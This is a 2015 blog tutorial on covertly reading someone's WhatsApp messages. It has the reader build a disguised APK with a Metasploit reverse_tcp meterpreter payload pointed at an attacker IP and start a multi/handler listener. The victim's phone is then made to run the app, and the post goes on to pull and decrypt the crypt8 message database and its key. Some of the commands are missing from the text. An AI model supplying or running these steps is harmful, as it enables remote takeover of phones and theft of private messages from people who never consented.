hotel rom: crypt8

Monday, October 5, 2015

Before starting the database decryption process,first obtain remote access to android device:

1. Start terminal and type:
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=81 R > fake.apk

[ Lhost=Attacker IP address, Lport=local port ]
This command will generate fake.apk in home directory.

2. Type: msfconsole
This command will start the metasploit framework.

3. Type: use exploit/multi/handler
In order to get multiple session on a single multi/handler.

4. Type: set payload android/meterpreter/reverse_tcp
This will provide the reverse connection from victim to attacker computer.

5. Type: show options
It will show the available options like lhost,lport

6. Set LHOST=192.168.0.2

7. Set LPORT=81

8. EXPLOIT

Now Run the app created in step 1 on your android phone and you'll get a meterpreter session

Also see:How to hack wifi using social engineering technique

After getting the meterpreter session type below command to download the file:

So, the database has been downloaded, now we need key to decrypt the database.

Follow the below command to Obtain the key for databases

(Means copy the file 'key' to sdcard>Download folder)

After obtaining the databases and key,Download the simple Github tool to decrpt the databases:

Click OK, you will see that a 'msgstore.decrypted' file has appeared at your desktop.

Open it using the same application, go to 'File' then 'Open'.
Provide the Decrypted file generated on desktop, leave the Account name and the 'wa.db', blank

Note: Rooted smartphone is required to gain database and key from smartphone.